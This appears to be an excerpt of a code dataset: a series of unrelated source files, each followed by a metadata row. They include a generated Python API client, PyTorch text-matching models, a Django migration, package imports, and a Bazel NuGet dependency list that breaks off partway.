# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['HMAC', 'jwt'] # noqa: E501
return self.api_client.call_api(
'/v1/size/from-hardware', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1SizeMatchingLog', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_sizes(self, **kwargs): # noqa: E501
"""get all sizes # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_sizes(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[V1SizeResponse]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_sizes_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_sizes_with_http_info(**kwargs) # noqa: E501
return data
def list_sizes_with_http_info(self, **kwargs): # noqa: E501
"""get all sizes # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_sizes_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[V1SizeResponse]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_sizes" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['HMAC', 'jwt'] # noqa: E501
return self.api_client.call_api(
'/v1/size', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[V1SizeResponse]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_size(self, body, **kwargs): # noqa: E501
"""updates a size. if the size was changed since this one was read, a conflict is returned # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_size(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param V1SizeUpdateRequest body: (required)
:return: V1SizeResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_size_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.update_size_with_http_info(body, **kwargs) # noqa: E501
return data
def update_size_with_http_info(self, body, **kwargs): # noqa: E501
"""updates a size. if the size was changed since this one was read, a conflict is returned # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_size_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param V1SizeUpdateRequest body: (required)
:return: V1SizeResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_size" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_size`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['HMAC', 'jwt'] # noqa: E501
return self.api_client.call_api(
'/v1/size', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1SizeResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 37.09688 | 186 | 0.598044 | 2,596 | 22,592 | 4.97265 | 0.076656 | 0.049578 | 0.026028 | 0.033465 | 0.948873 | 0.943683 | 0.940816 | 0.932605 | 0.931676 | 0.920985 | 0 | 0.017948 | 0.309446 | 22,592 | 608 | 187 | 37.157895 | 0.809499 | 0.326664 | 0 | 0.820122 | 0 | 0 | 0.164248 | 0.029734 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039634 | false | 0 | 0.012195 | 0 | 0.109756 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8c26d58635c87356ad288fde7b0c7feb839f582a | 14,081 | py | Python | rationalizers/modules/matchings.py | deep-spin/spectra-rationalization | ef2b411dd7d6b83f6582fb98dd06d4f517c0912b | [
"MIT"
] | 8 | 2021-09-13T14:51:06.000Z | 2022-03-18T13:24:05.000Z | rationalizers/modules/matchings.py | deep-spin/spectra-rationalization | ef2b411dd7d6b83f6582fb98dd06d4f517c0912b | [
"MIT"
] | null | null | null | rationalizers/modules/matchings.py | deep-spin/spectra-rationalization | ef2b411dd7d6b83f6582fb98dd06d4f517c0912b | [
"MIT"
] | null | null | null | import torch
from torch import nn
import torch.nn.functional as F
import ipdb
from torch.distributions import RelaxedOneHotCategorical
from rationalizers.modules.matchings_utils import submul, apply_multiple
from rationalizers.builders import build_sentence_encoder
from rationalizers.modules.sparsemap import (
matching_smap,
matching_smap_atmostone,
matching_smap_atmostone_budget,
)
class LPSparseMAPFaithfulMatching(nn.Module):
"""
ESIM model with SPECTRA strategies for extraction of the sparse alignment.
For faithful alignments (the only information about the premise that the model
has to make a prediction comes from the alignment and its masking of the encoded
representation), turn the `faithful` flag on.
"""
def __init__(
self,
embed: nn.Embedding = None,
hidden_size: int = 200,
dropout: float = 0.1,
layer: str = "lstm",
bidirectional: bool = True,
temperature: float = 1.0,
budget: float = 1.0,
nonlinearity: str = "sigmoid",
output_size: int = 1,
matching_type: str = "AtMostONE",
faithful: bool = True,
):
super().__init__()
self.faithful = faithful
self.matching_type = matching_type
emb_size = embed.weight.shape[1]
enc_size = 2 * hidden_size if bidirectional else hidden_size
self.embed_layer = nn.Sequential(embed, nn.Dropout(p=dropout))
self.context_lstm = build_sentence_encoder(
layer,
emb_size,
hidden_size,
bidirectional=True,
)
self.z = None # z samples
self.temperature = temperature
self.budget = budget
if self.faithful:
self.projection_x1 = nn.Sequential(
nn.Linear(enc_size, hidden_size), nn.ReLU()
)
self.projection_x2 = nn.Sequential(
nn.Linear(enc_size + enc_size, hidden_size), nn.ReLU()
)
else:
self.projection = nn.Sequential(
nn.Linear(4 * 2 * hidden_size, hidden_size), nn.ReLU()
)
self.composition_lstm = build_sentence_encoder(
layer,
hidden_size,
hidden_size,
bidirectional=True,
)
self.output_layer = nn.Sequential(
nn.Dropout(p=dropout),
nn.Linear(4 * enc_size, output_size),
nn.Sigmoid() if nonlinearity == "sigmoid" else nn.LogSoftmax(dim=-1),
)
def forward(self, x1, x2, mask):
"""
:param x1: premise embeddings
:param x2: hypothesis embeddings
:param mask: list [mask_x1, mask_x2] -- mask should be true/1 for valid positions, false/0 for invalid ones.
"""
batch_size, _ = x1.shape
lengths_x1 = mask[0].long().sum(1)
lengths_x2 = mask[1].long().sum(1)
mask_x1 = mask[0]
mask_x2 = mask[1]
emb_x1 = self.embed_layer(x1) # [B, T, E]
emb_x2 = self.embed_layer(x2) # [B, D, E]
# BiLSTM representation of the x1ise and x2thesis
x1_h, _ = self.context_lstm(emb_x1, mask_x1, lengths_x1)
x2_h, _ = self.context_lstm(emb_x2, mask_x2, lengths_x2)
# [B, T, D]
h_alignments = torch.bmm(x1_h, x2_h.transpose(1, 2))
z = []
for k in range(batch_size):
scores = h_alignments[k] / self.temperature
if self.matching_type == "AtMostONE":
if self.training:
z_probs = matching_smap_atmostone(scores, max_iter=10) # [T,D]
else:
z_probs = torch.zeros(scores.shape, device=scores.device)
z_probs_sparsemap = matching_smap_atmostone(
scores[: lengths_x1[k], : lengths_x2[k]] / 1e-3, max_iter=1000
)
z_probs[: lengths_x1[k], : lengths_x2[k]] = z_probs_sparsemap
if self.matching_type == "XOR-AtMostONE":
if self.training:
z_probs = matching_smap(scores, max_iter=10) # [T,D]
else:
z_probs = torch.zeros(scores.shape, device=scores.device)
z_probs_sparsemap = matching_smap(
scores[: lengths_x1[k], : lengths_x2[k]] / 1e-3, max_iter=1000
)
z_probs[: lengths_x1[k], : lengths_x2[k]] = z_probs_sparsemap
if self.matching_type == "AtMostONE-Budget":
if self.training:
z_probs = matching_smap_atmostone_budget(
scores, max_iter=10, budget=self.budget
) # [T,D]
else:
z_probs = torch.zeros(scores.shape, device=scores.device)
z_probs_sparsemap = matching_smap_atmostone_budget(
scores[: lengths_x1[k], : lengths_x2[k]] / 1e-3,
max_iter=1000,
budget=self.budget,
)
z_probs[: lengths_x1[k], : lengths_x2[k]] = z_probs_sparsemap
z_probs = z_probs * mask[1][k].unsqueeze(0)
z_probs = z_probs * mask[0][k].unsqueeze(-1)
z.append(z_probs)
z = torch.stack(z, dim=0).squeeze(-1) # [B, T, D]
z = z.to(h_alignments.device)
self.z = z
x1_align = torch.matmul(z, x2_h)
x2_align = torch.matmul(z.transpose(-1, -2), x1_h)
if self.faithful:
x1_combined = x1_align
x2_combined = torch.cat([x2_h, x2_align], -1)
x1_combined = self.projection_x1(x1_combined)
x2_combined = self.projection_x2(x2_combined)
else:
x1_combined = torch.cat([x1_h, x1_align, submul(x1_h, x1_align)], -1)
x2_combined = torch.cat([x2_h, x2_align, submul(x2_h, x2_align)], -1)
x1_combined = self.projection(x1_combined)
x2_combined = self.projection(x2_combined)
x1_compose, _ = self.composition_lstm(x1_combined, mask_x1, lengths_x1)
x2_compose, _ = self.composition_lstm(x2_combined, mask_x2, lengths_x2)
x1_rep = apply_multiple(x1_compose)
x2_rep = apply_multiple(x2_compose)
x = torch.cat([x1_rep, x2_rep], -1)
y_hat = self.output_layer(x)
return z, y_hat
class GumbelFaithfulMatching(nn.Module):
"""
The Matching Generator takes two input texts and returns samples from p(z|x1,x2)
"""
def __init__(
self,
embed: nn.Embedding = None,
hidden_size: int = 200,
dropout: float = 0.1,
layer: str = "lstm",
bidirectional: bool = True,
temperature: float = 1.0,
nonlinearity: str = "sigmoid",
output_size: int = 1,
faithful: bool = True,
):
super().__init__()
self.faithful = faithful
emb_size = embed.weight.shape[1]
enc_size = 2 * hidden_size if bidirectional else hidden_size
self.embed_layer = nn.Sequential(embed, nn.Dropout(p=dropout))
self.context_lstm = build_sentence_encoder(
layer,
emb_size,
hidden_size,
bidirectional=True,
)
self.z = None # z samples
self.temperature = temperature
if self.faithful:
self.projection_x1 = nn.Sequential(
nn.Linear(enc_size, hidden_size), nn.ReLU()
)
self.projection_x2 = nn.Sequential(
nn.Linear(enc_size + enc_size, hidden_size), nn.ReLU()
)
else:
self.projection = nn.Sequential(
nn.Linear(4 * 2 * hidden_size, hidden_size), nn.ReLU()
)
self.composition_lstm = build_sentence_encoder(
layer,
hidden_size,
hidden_size,
bidirectional=True,
)
self.output_layer = nn.Sequential(
nn.Dropout(p=dropout),
nn.Linear(4 * enc_size, output_size),
nn.Sigmoid() if nonlinearity == "sigmoid" else nn.LogSoftmax(dim=-1),
)
def forward(self, x1, x2, mask):
"""
:param x1: premise embeddings
:param x2: hypothesis embeddings
:param mask: list [mask_x1, mask_x2] -- mask should be true/1 for valid positions, false/0 for invalid ones.
"""
batch_size, _ = x1.shape
lengths_x1 = mask[0].long().sum(1)
lengths_x2 = mask[1].long().sum(1)
mask_x1 = mask[0]
mask_x2 = mask[1]
emb_x1 = self.embed_layer(x1) # [B, T, E]
emb_x2 = self.embed_layer(x2) # [B, D, E]
# BiLSTM representation of the x1ise and x2thesis
x1_h, _ = self.context_lstm(emb_x1, mask_x1, lengths_x1)
x2_h, _ = self.context_lstm(emb_x2, mask_x2, lengths_x2)
# [B, T, D]
h_alignments = torch.bmm(x1_h, x2_h.transpose(1, 2))
if not self.training:
row_x1_probs = F.gumbel_softmax(
h_alignments / 1e-6, tau=self.temperature, dim=1, hard=True
)
column_x2_probs = F.gumbel_softmax(
h_alignments / 1e-6, tau=self.temperature, dim=2, hard=True
)
else:
row_x1_probs = F.gumbel_softmax(h_alignments, tau=self.temperature, dim=1)
column_x2_probs = F.gumbel_softmax(
h_alignments, tau=self.temperature, dim=2
)
x1_align = torch.matmul(row_x1_probs, x2_h)
x2_align = torch.matmul(column_x2_probs.transpose(-2, -1), x1_h)
if self.faithful:
x1_combined = x1_align
x2_combined = torch.cat([x2_h, x2_align], -1)
x1_combined = self.projection_x1(x1_combined)
x2_combined = self.projection_x2(x2_combined)
else:
x1_combined = torch.cat([x1_h, x1_align, submul(x1_h, x1_align)], -1)
x2_combined = torch.cat([x2_h, x2_align, submul(x2_h, x2_align)], -1)
x1_combined = self.projection(x1_combined)
x2_combined = self.projection(x2_combined)
x1_compose, _ = self.composition_lstm(x1_combined, mask_x1, lengths_x1)
x2_compose, _ = self.composition_lstm(x2_combined, mask_x2, lengths_x2)
x1_rep = apply_multiple(x1_compose)
x2_rep = apply_multiple(x2_compose)
x = torch.cat([x1_rep, x2_rep], -1)
y_hat = self.output_layer(x)
z = [row_x1_probs, column_x2_probs]
return z, y_hat
class ESIMFaithfulMatching(nn.Module):
"""
The Matching Generator takes two input texts and returns samples from p(z|x1,x2)
"""
def __init__(
self,
embed: nn.Embedding = None,
hidden_size: int = 200,
dropout: float = 0.1,
layer: str = "lstm",
bidirectional: bool = True,
temperature: float = 1.0,
nonlinearity: str = "sigmoid",
output_size: int = 1,
faithful: bool = True,
):
super().__init__()
self.faithful = faithful
emb_size = embed.weight.shape[1]
enc_size = 2 * hidden_size if bidirectional else hidden_size
self.embed_layer = nn.Sequential(embed, nn.Dropout(p=dropout))
self.context_lstm = build_sentence_encoder(
layer,
emb_size,
hidden_size,
bidirectional=True,
)
self.z = None # z samples
self.temperature = temperature
if self.faithful:
self.projection_x1 = nn.Sequential(
nn.Linear(enc_size, hidden_size), nn.ReLU()
)
self.projection_x2 = nn.Sequential(
nn.Linear(enc_size + enc_size, hidden_size), nn.ReLU()
)
else:
self.projection = nn.Sequential(
nn.Linear(4 * 2 * hidden_size, hidden_size), nn.ReLU()
)
self.composition_lstm = build_sentence_encoder(
layer,
hidden_size,
hidden_size,
bidirectional=True,
)
self.output_layer = nn.Sequential(
nn.Dropout(p=dropout),
nn.Linear(4 * enc_size, output_size),
nn.Sigmoid() if nonlinearity == "sigmoid" else nn.LogSoftmax(dim=-1),
)
def forward(self, x1, x2, mask):
batch_size, _ = x1.shape
lengths_x1 = mask[0].long().sum(1)
lengths_x2 = mask[1].long().sum(1)
mask_x1 = mask[0]
mask_x2 = mask[1]
emb_x1 = self.embed_layer(x1) # [B, T, E]
emb_x2 = self.embed_layer(x2) # [B, D, E]
# BiLSTM representation of the x1ise and x2thesis
x1_h, _ = self.context_lstm(emb_x1, mask_x1, lengths_x1)
x2_h, _ = self.context_lstm(emb_x2, mask_x2, lengths_x2)
# [B, T, D]
h_alignments = torch.bmm(x1_h, x2_h.transpose(1, 2))
row_x1_probs = F.softmax(h_alignments, dim=1)
column_x2_probs = F.softmax(h_alignments, dim=2)
x1_align = torch.matmul(row_x1_probs, x2_h)
x2_align = torch.matmul(column_x2_probs.transpose(-2, -1), x1_h)
if self.faithful:
x1_combined = x1_align
x2_combined = torch.cat([x2_h, x2_align], -1)
x1_combined = self.projection_x1(x1_combined)
x2_combined = self.projection_x2(x2_combined)
else:
x1_combined = torch.cat([x1_h, x1_align, submul(x1_h, x1_align)], -1)
x2_combined = torch.cat([x2_h, x2_align, submul(x2_h, x2_align)], -1)
x1_combined = self.projection(x1_combined)
x2_combined = self.projection(x2_combined)
x1_compose, _ = self.composition_lstm(x1_combined, mask_x1, lengths_x1)
x2_compose, _ = self.composition_lstm(x2_combined, mask_x2, lengths_x2)
x1_rep = apply_multiple(x1_compose)
x2_rep = apply_multiple(x2_compose)
x = torch.cat([x1_rep, x2_rep], -1)
y_hat = self.output_layer(x)
z = [row_x1_probs, column_x2_probs]
return z, y_hat
| 34.427873 | 116 | 0.57574 | 1,764 | 14,081 | 4.335601 | 0.102041 | 0.039226 | 0.027458 | 0.01569 | 0.87147 | 0.858394 | 0.847673 | 0.847673 | 0.82113 | 0.82113 | 0 | 0.038994 | 0.322491 | 14,081 | 408 | 117 | 34.512255 | 0.762683 | 0.076699 | 0 | 0.751634 | 0 | 0 | 0.007862 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019608 | false | 0 | 0.026144 | 0 | 0.065359 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8c51e42df612fbec82c472266c26308a524cd1d5 | 3,375 | py | Python | agreements/migrations/0002_auto_20201121_0305.py | cu-library/mellyn | 7ac6d45d67c21223da1a6b7902577148721593d1 | [
"MIT"
] | null | null | null | agreements/migrations/0002_auto_20201121_0305.py | cu-library/mellyn | 7ac6d45d67c21223da1a6b7902577148721593d1 | [
"MIT"
] | 8 | 2020-06-11T01:35:43.000Z | 2021-05-27T18:22:45.000Z | agreements/migrations/0002_auto_20201121_0305.py | cu-library/mellyn | 7ac6d45d67c21223da1a6b7902577148721593d1 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.3 on 2020-11-21 03:05
import django.core.validators
from django.db import migrations, models
import django_bleach.models
class Migration(migrations.Migration):
dependencies = [
('agreements', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='agreement',
name='body',
field=django_bleach.models.BleachField(help_text='HTML content of the agreement. The following tags are allowed: h3, p, a, abbr, cite, code, small, em, strong, sub, sup, u, ul, ol, li, br. Changing this field after the agreement has been signed by patrons is strongly discouraged.'),
),
migrations.AlterField(
model_name='agreement',
name='redirect_url',
field=models.URLField(help_text="URL displayed to patrons after signing the agreement. It is prefixed by the text 'Return to '. It must start with 'https://'.", validators=[django.core.validators.URLValidator(code='need_https', message="Enter a valid URL. It must start with 'https://'.", schemes=['https'])]),
),
migrations.AlterField(
model_name='historicalagreement',
name='body',
field=django_bleach.models.BleachField(help_text='HTML content of the agreement. The following tags are allowed: h3, p, a, abbr, cite, code, small, em, strong, sub, sup, u, ul, ol, li, br. Changing this field after the agreement has been signed by patrons is strongly discouraged.'),
),
migrations.AlterField(
model_name='historicalagreement',
name='redirect_url',
field=models.URLField(help_text="URL displayed to patrons after signing the agreement. It is prefixed by the text 'Return to '. It must start with 'https://'.", validators=[django.core.validators.URLValidator(code='need_https', message="Enter a valid URL. It must start with 'https://'.", schemes=['https'])]),
),
migrations.AlterField(
model_name='historicalresource',
name='description',
field=django_bleach.models.BleachField(blank=True, help_text='An HTML description of the resource. The following tags are allowed: h3, p, a, abbr, cite, code, small, em, strong, sub, sup, u, ul, ol, li, br.'),
),
migrations.AlterField(
model_name='historicalresource',
name='low_codes_email',
field=models.CharField(blank=True, help_text='The recipient of email warnings about low numbers of remaning unassigned license codes. If empty, no emails are sent.', max_length=200, validators=[django.core.validators.EmailValidator()]),
),
migrations.AlterField(
model_name='resource',
name='description',
field=django_bleach.models.BleachField(blank=True, help_text='An HTML description of the resource. The following tags are allowed: h3, p, a, abbr, cite, code, small, em, strong, sub, sup, u, ul, ol, li, br.'),
),
migrations.AlterField(
model_name='resource',
name='low_codes_email',
field=models.CharField(blank=True, help_text='The recipient of email warnings about low numbers of remaning unassigned license codes. If empty, no emails are sent.', max_length=200, validators=[django.core.validators.EmailValidator()]),
),
]
| 60.267857 | 322 | 0.664296 | 423 | 3,375 | 5.224586 | 0.271868 | 0.072398 | 0.090498 | 0.104977 | 0.912217 | 0.912217 | 0.837104 | 0.837104 | 0.837104 | 0.837104 | 0 | 0.011056 | 0.222815 | 3,375 | 55 | 323 | 61.363636 | 0.831491 | 0.013333 | 0 | 0.816327 | 1 | 0.163265 | 0.472957 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.061224 | 0 | 0.122449 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8c553aa56907fe633f2f25aecce53e72c0d3509f | 617 | py | Python | sdk/lusid_drive/utilities/__init__.py | fossabot/drive-sdk-python-preview | 41fa1f8f0ea5101ca0795b76fdaaae4162f19bb1 | [
"MIT"
] | null | null | null | sdk/lusid_drive/utilities/__init__.py | fossabot/drive-sdk-python-preview | 41fa1f8f0ea5101ca0795b76fdaaae4162f19bb1 | [
"MIT"
] | null | null | null | sdk/lusid_drive/utilities/__init__.py | fossabot/drive-sdk-python-preview | 41fa1f8f0ea5101ca0795b76fdaaae4162f19bb1 | [
"MIT"
] | 1 | 2021-03-01T02:27:02.000Z | 2021-03-01T02:27:02.000Z | from lusid_drive.utilities.api_client_builder import ApiClientBuilder
from lusid_drive.utilities.api_configuration_loader import ApiConfigurationLoader
from lusid_drive.utilities.refreshing_token import RefreshingToken
from lusid_drive.utilities.api_client_factory import ApiClientFactory
from lusid_drive.utilities.lusid_drive_retry import lusid_drive_retry
from lusid_drive.utilities.proxy_config import ProxyConfig
from lusid_drive.utilities.api_configuration import ApiConfiguration
from lusid_drive.utilities.utility_functions import get_file_id
from lusid_drive.utilities.utility_functions import get_folder_id
| 61.7 | 81 | 0.91248 | 82 | 617 | 6.52439 | 0.341463 | 0.205607 | 0.235514 | 0.386916 | 0.44486 | 0.44486 | 0.179439 | 0.179439 | 0 | 0 | 0 | 0 | 0.058347 | 617 | 9 | 82 | 68.555556 | 0.920826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4fd21401647d1e0e9a2ae7fa52161bd7317724db | 93 | py | Python | label_colours.py | KevinLL218/Mydatabase | 6bf48aed67a1b7cd3b847c9e54caf0406e1cea40 | [
"MIT"
] | 2 | 2021-07-15T06:59:14.000Z | 2021-07-19T01:34:47.000Z | label_colours.py | KevinLL218/Mydatabase | 6bf48aed67a1b7cd3b847c9e54caf0406e1cea40 | [
"MIT"
] | 2 | 2021-06-10T08:09:44.000Z | 2021-07-19T02:01:46.000Z | label_colours.py | KevinLL218/Underwater-Image-Segmentation | 6bf48aed67a1b7cd3b847c9e54caf0406e1cea40 | [
"MIT"
] | null | null | null | label_colours = [(0, 0, 0),
(0, 128, ),
(128, 0, 0)] | 31 | 31 | 0.268817 | 10 | 93 | 2.4 | 0.4 | 0.333333 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.285714 | 0.548387 | 93 | 3 | 32 | 31 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8b12ddfcdfb2e5d96555698218b0d3232eae84c4 | 54,971 | bzl | Python | nugets.bzl | tomaszstrejczek/rules_dotnet_3rd_party | 09f29f062d5250fe7cdc45be872ce9bd1562c60b | [
"Apache-2.0"
] | 1 | 2021-10-10T17:17:27.000Z | 2021-10-10T17:17:27.000Z | nugets.bzl | tomaszstrejczek/rules_dotnet_3rd_party | 09f29f062d5250fe7cdc45be872ce9bd1562c60b | [
"Apache-2.0"
] | null | null | null | nugets.bzl | tomaszstrejczek/rules_dotnet_3rd_party | 09f29f062d5250fe7cdc45be872ce9bd1562c60b | [
"Apache-2.0"
] | null | null | null | load("@io_bazel_rules_dotnet//dotnet/private:rules/nuget.bzl", "nuget_package")
def repositories_nugets():
### Generated by the tool
nuget_package(
name = "microsoft.extensions.filesystemglobbing",
package = "microsoft.extensions.filesystemglobbing",
version = "3.1.3",
sha256 = "15ff566cbf79a964269711cb4b1000187ce9bd18a5292363ca55d00ff91a28a5",
core_lib = {
"netcoreapp2.0": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"netcoreapp2.1": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"netcoreapp3.0": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"netcoreapp3.1": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
},
net_lib = {
"net461": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"net462": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"net47": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"net471": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"net472": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"net48": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"netstandard2.0": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"netstandard2.1": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
},
mono_lib = "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
core_files = {
"netcoreapp2.0": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
"netcoreapp2.1": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
"netcoreapp3.0": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
"netcoreapp3.1": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
},
net_files = {
"net461": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
"net462": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
"net47": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
"net471": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
"net472": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
"net48": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
"netstandard2.0": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
"netstandard2.1": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
},
mono_files = [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
)
nuget_package(
name = "newtonsoft.json",
package = "newtonsoft.json",
version = "9.0.1",
sha256 = "998081ae052120917346e2cb57d488888147a2fcdf47c52ea9f83a7b4f049e55",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.0/Newtonsoft.Json.dll",
